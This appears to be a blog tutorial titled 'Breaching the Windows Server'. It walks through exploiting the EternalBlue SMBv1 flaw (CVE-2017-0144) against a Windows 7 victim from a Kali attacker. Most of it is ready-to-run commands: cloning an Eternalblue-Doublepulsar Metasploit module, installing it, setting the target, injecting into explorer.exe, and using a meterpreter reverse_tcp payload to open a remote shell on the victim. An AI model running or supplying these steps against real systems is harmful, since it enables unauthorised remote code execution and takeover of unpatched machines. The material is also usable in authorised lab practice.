Breaching the Windows Server

Breaching the Windows Server


Introduction

EternalBlue is nothing but an achievement that the National Security Agency (NSA) has actually developed and used. But this was somehow leaked in April 2017 by the hacker group called the Shadow Brokers, and this vulnerability leaked online was then used in the devastating effects of the worldwide WannaCry ransomware attack and NotPetya ransomware. So what this hack does is that the Windows Server Message Block 1.0 (SMBv1) effectively exploits a vulnerability. SMB is a protocol that Windows machines use to share files in the same network. The SMBv1 server was therefore unable to manage specially crafted payloads in this bug, resulting in remote execution of code. This vulnerability has been identified and has already been documented CVE-2017-0144.

So let’s start with our demo

Our Victim: Windows 7 (IP address: 192.168.0.103)

Breaching the Windows Server

Our Attacker: Kali (IP address: 192.168.0.105)

Breaching the Windows Server

Until you start, make sure you have wine in your kali. If you don’t type the following commands in your Kali. (Wine is used for exe files or windows applications in many operating systems)

dpkg –add-architecture i386

apt-get update

apt-get install wine32

Next, you need to download the exploit and place it in our database of Metasploit.

So from the relation below, we can get the exploit: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Breaching the Windows Server

Go to your terminal and type:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Breaching the Windows Server

You have now accessed the folder where the exploit was downloaded.

Breaching the Windows Server

Copy the Eternal Blue-Doublepulsar.rb file and place it under the following directory /usr/share/metasploit-framework /module/exploits/windows/smb/

Breaching the Windows Server

Start your Metasploit program now that all is configured by sort msfconsole

Breaching the Windows Server

Now serach for eternalblue exploit

Breaching the Windows Server

Type this to use our double exploit now: use exploit/windows/smb/eternalblue_doublepulsar then type: show options To list all of the choices that we need to fill in.

Breaching the Windows Server

First, we need to set our remote or target host and the process we want to migrate to, so type the commands below:

set RHOST 192.168.0.103

set PROCESSINJECT explorer.exe

Breaching the Windows Server

So now we need a payload in our meterpreter to give us a reverse connection:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Breaching the Windows Server

Set your host to listen to the reverse link (the IP address of the attacker)

set LHOST 192.168.0.105

Now as everything is setup, just type in exploit and you are ready to go.

Breaching the Windows Server
Breaching the Windows Server

And we got our session with the meterpreter. Now just type in shell to give you the command prompt of your victim machine.

Breaching the Windows Server

NOTE: Metasploit also has a module to test whether or not the victim’s computer is vulnerable to this attack. You could first use this to test and then use the exploit to carry out the attack as explained above. We might use the module auxiliary/scanner/smb/smb_ms17_010 and then set your target host to initiate the scan.

So that’s for now. See you next time.



Solutions

Solutions

Services

Services